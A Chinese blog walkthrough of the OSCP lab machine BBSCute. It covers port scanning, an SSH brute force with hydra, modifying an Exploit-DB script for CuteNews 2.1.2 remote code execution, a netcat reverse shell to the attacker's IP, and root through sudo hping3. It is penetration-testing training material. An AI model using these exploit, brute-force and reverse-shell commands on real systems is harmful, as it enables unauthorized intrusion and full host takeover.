OSCP靶场系列-Esay-BBSCute保姆级

已于 2023-07-23 13:21:29 修改
阅读量6.1k 收藏
点赞数 1
分类专栏: OSCP 文章标签: 网络 服务器 web安全 网络安全
于 2023-07-23 01:36:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/131875156
版权

Esay-1-BBSCute保姆级

目录

getwebshell → 目录扫描发现新端点 → 指纹探测发现CMS → 查看文章发现版本信息 → MSF → 调配修改获得shell
getshell → sudo发现hping3 → 利用hping3提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.176

  • 启动靶机
  • 获取目标机器IP > 192.168.190.128

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次
sudo nmap --min-rate 10000 -p- 192.168.190.128

>[!通过各两次扫描收集到端口 ]
>22,80,88,110,995

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p22,80,88,110,995 192.168.190.128

信息收集-端口测试

  • 22-open-openssh 7.9p1
  • 80-open-http
  • 88-open-http
  • 110-open-pop3
  • 995-open-ssl/pop3
    总体来看,突破口在80端口以及88端口

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(无)

通过Nmap探测获得SSH的版本信息,可以尝试利用

# 进入msf
msfcontrol
# 探测版本为OpenSSH 7.9p1 搜索对应脚本
msf6 > searchsploit openssh 7.9

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破发现报错之后进行手动尝试

ssh root@192.168.190.128</span> ssh -p22
# 密码尝试
password &gt; root

22-SSH弱口令爆破(慢慢跑)

尝试root账户的密码爆破,利用工具hydra,线程-t为6
慢慢跑吧,不指望

hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.190.128 ssh -s 22

80-HTTP端口的信息收集

http://192.168.190.128:80


通常遇到这样的网站之后我们直接从收集源码开始

信息收集-源码查看(无)
curl http://192.168.190.128:80

整体翻阅了一下,无泄露信息

信息收集-基础目录扫描
dirsearch -u http://192.168.190.128:80 -x 302,403

发现内容之后,我们先不考虑上大字典

信息收集-dirsearch深层目录扫描(待定)
信息收集-端点访问

寻找可用端点

/example.php端点

/manual/en/index.html端点

/print.php端点

/rss.php端点

/search.php端点

/index.php端点

信息收集-指纹识别

通过端点访问,首先选取最感兴趣的进行探索(登录功能点)

┌──(root㉿Kali)-[/home/bachang/BBSCute]
└─# whatweb http://192.168.190.128:80/index.php
http://192.168.190.128:80/index.php [200 OK] Apache[2.4.38], Bootstrap, Cookies[CUTENEWS_SESSION], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.190.128], JQuery, PasswordField[password], Script[text/javascript], Title[Please Login / CuteNews], UncommonHeaders[accept-charset], X-Frame-Options[sameorigin], X-UA-Compatible[IE=edge]

获取了CMS的指纹CuteNews,如果知道版本就可用msf精准打击

信息收集-源码查看
# 利用html2text转换纯文本方便查看
curl http://192.168.190.128:80/index.php | html2text

查看之后获取到了新的信息CuteNews的版本为2.1.2

88-HTTP端口的信息收集

什么!?还要收集吗? 80端口都getwebshell啦?

漏洞利用-getwebshell

漏洞利用-msf网站指纹(尝试)
# 首先进入msf终端
msfconsole
# 搜索对应的漏洞是否存在
msf6 &gt; searchsploit cutenews 2.1.2

可以思考的是第一个、第三个、第四个。第二个文件删除不能直接getwebshell
其中第三个文件上传相对要复杂一些
第一个可能有前置条件,保险一些先试试第四个?

# 如果想查看msf对应的内容
cat /usr/share/exploitdb/exploits/php/webapps/48800.py

细细翻阅一下


大致了解了脚本的情况,运行了之后让我们输入IP,之后就会根据代码逻辑获得cmdshell

一般获取脚本之后我们就清楚需要是否需要修改shell以及输入内容等

# 尝试运行,发现没运行成功捏
python3 /usr/share/exploitdb/exploits/php/webapps/48800.py
[-&gt;] Usage python3 expoit.py

Enter the URL&gt; http://192.168.190.128:80
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================


运行没成功说明可能其他地方还需要修改或者该exp不适用
首先进行url的排查

cat /usr/share/exploitdb/exploits/php/webapps/48800.py

查看了一下,发现expurl是加了/CuteNews端点,和我们现在不符,进行删除

# cp到本地一份方便修改(这是好习惯)
┌──(root㉿Kali)-[/home/bachang/BBSCute]
└─# cp /usr/share/exploitdb/exploits/php/webapps/48800.py .
# 查询有几处
┌──(root㉿Kali)-[/home/bachang/BBSCute]
└─# grep CuteNews 48800.py                    
url = f"{ip}/CuteNews/cdata/users/lines"
register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&amp;opt=personal").text
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
# 修改了5处地方
┌──(root㉿Kali)-[/home/bachang/BBSCute]
└─# vim 48800.py 
# 再次查看已经没有了
┌──(kali㉿kali)-[~]
└─$ grep CuteNews 48800.py  
# 尝试运行
python 48800.py

运行成功,获取了cmdshell

# ps 翻阅了一下不用苦逼的vim修改,利用sed 将所有的 “CuteNews/” 替换为空字符串
sed -i 's:CuteNews/::g' 48800.py
# 查看一下权限
command &gt; id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

内网遨游-getshell

发现hydra还没爆破出来,关了关了

获取交互shell

现在我们的shell是利用pythonexp获取的,我们获取本地的shell会更好
利用反弹shell弹到本地

反弹shell-nc
# 攻击机先开启监听
nc -lvvp 4444

# 目标主机nc反弹shell
nc -e /bin/bash 192.168.45.176 4444

交互shell-python

由于反弹获取的shell交互不友好,利用python获得新的交互shell

# 利用python获取交互shell -&gt; python失败使用python3
python -c "import pty;pty.spawn('/bin/bash')";

FLAG1获取

www-data<span>@cute</span>:/var/www/html/uploads$ find / -name local.txt 2&gt;/dev/null
find / -name local.txt 2&gt;/dev/null
/var/www/local.txt
www-data<span>@cute</span>:/var/www/html/uploads$ cat /var/www/local.txt
cat /var/www/local.txt
*****************************

权限提升

访问 https://gtfobins.github.io 寻找

Linux提权-sudo提权尝试

查找具有sudo权限,且不需要密码的可提权文件

# 利用sudo -l寻找
www-data<span>@cute</span>:/var/www/html/uploads$ sudo -l
sudo -l
Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp

发现hping3存在sudo权限


如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

www-data<span>@cute</span>:/var/www/html/uploads$ hping3
hping3&gt; /bin/sh -p
# whoami
root

成功提权

FLAG2

# cat /root/proof.txt
*************************

结束撒花?谢谢观看

杳若听闻
关注
专栏目录
OSCP靶场1-SolidState(smtp、pop3、james)
墨痕诉清风的博客
04-22 356
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
OSCP靶场7-Assertion(目录穿越、命令执行、aria2c提权)
墨痕诉清风的博客
06-07 275
扫描和枚举我们将从扫描目标机器上的开放端口和服务开始,并记住将结果存储在某个地方以便我们可以返回它。还要记住,最好使用 -p- 标志检查所有端口以防万一。-p- *目标 ip* > nmapPn - 这是告诉 nmap 正在扫描的目标已启动并正在运行,因此不必担心检查是否已启动。sV – 检查端口以确定服务/版本sC – 使用脚本检查漏洞只打开了两个端口,这可能好,也可能不好。以防万一我也运行 udp 扫描。UDP 方面似乎没有什么突出的。查看 http 站点,有一件事引起了我的注意。
OSCP系列靶场-Esay-SunsetDecoy
2301_80115097的博客
04-03 1430
发现zip文件 →zip存在密码 →john爆破zip密码 → 发现passwd与shadow文件 → 爆破shadow密码 →ssh登录提 权 思 路: 发现后台运行程序 → 上传pspy64查看 → 发现chkrootkit→chkrootkit提权当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!
【OSCP系列】OSCP靶机-Sumo(原创)
最新发布
Lusen的博客
07-22 731
OSCP系列-Sumo靶场做题记录
OSCP系列靶场-Esay-PyExp保姆
杳若的博客
08-21 2054
OSCP系列靶场-Esay-PyExp保姆
OSCP系列靶场-Esay-Moneybox
2301_80115097的博客
04-03 657
查看历史记录也是一件很重要的事情声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
OSCP系列靶场-Esay-Gaara
杳若的博客
08-07 3070
OSCP系列靶场-Esay-Gaara
【OSCP系列靶场-Esay-Potato】
Technology_77的博客
09-14 306
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。根据收集的数据和经验,改进蜜罐配置和网络安全防御。从初代到现在,黑客发展逐渐有了对于名号的划分,从1999年起的“中美黑客大战”,Honker这一词逐渐进入人们的眼球。总的来说,Easy Potato是一个强大的蜜罐系统,可以帮助提升蜜罐的有效性和网络安全防御。这些都值得耐人寻味,不过,黑客这一词在莎士比亚的那个年代就存在了,最早的计算机诞生于1946年宾夕法尼亚大学,而最早的黑客却出现在。
OSCP系列靶场-Esay-Ha-natraj
hackzkaq的博客
01-02 922
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
OSCP靶场5-noontide(irc、UnrealIRCd)
墨痕诉清风的博客
05-09 275
枚举我们从nmap开始,看看哪些端口是开放的。我们看到它只有一个开放端口,它是6667,UnrealIRCd正在运行。我们寻找是否有,并找到[1]。在看到exploit之后,我们看到我们可以在不需要exploit的情况下执行“exploit”手。开发我们让nc听…我们使用nc连接到IRC服务器,一旦连接,我们必须把AB;有效负载\n,我们将用一个命令替换“有效负载”,以便我们从一个反向shell。shell我们得到了shelllocal.txt一旦进入,我们寻找用户标志…权限提升。
OSCP系列靶场-Esay-Shakabrah
杳若的博客
08-16 559
OSCP系列靶场-Esay-Shakabrah
OSCP系列靶场-Esay-Sumo
HUANGXIN9898的博客
09-19 188
从发现ssh版本开始就感觉有点偏老,应该多尝试老漏洞有时候nikto工具也可以适当用一下,指不定有其他收获。
OSCP推荐靶场-Stapler
qq_63785498的博客
10-07 239
OSCP推荐靶场-Stapler
OSCP靶场4-HL(命令注入、find提权)
墨痕诉清风的博客
05-06 204
别:初/中Arp-scan或可用于发现租用的 IP 地址。在我的网络上,机器被分配了 IP 地址。让我们使用nmap扫描这台机器。使用nmap的端口扫描显示Apache服务器在端口 80 上运行。这是这台机器上唯一开放的端口,因此我们可以假设我们在这个机器上的立足点将通过一个易受攻击的 Web 应用程序或脚本(因为这是一个毕竟,CTF!)。192.168.10.42 主机的 Nmap 扫描报告已启动(0.0083 秒延迟)。未显示:65534 关闭端口。
类OSCP靶机-Kioptix Level 2
ETO发展中心
08-02 445
同步发布:https://www.youi.xin/?p=449 1.信息收集 环境部署可参考上一篇https://www.youi.xin/?p=435 通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
【OSCP系列】OSCP靶机-Cybersploit2(原创)
Lusen的博客
07-18 284
OSCP系列-Cybersploit2靶场记录
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 487
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
OSCP靶机----OnSystemShellDredd
qq_53003652的博客
09-13 247
WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1080
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值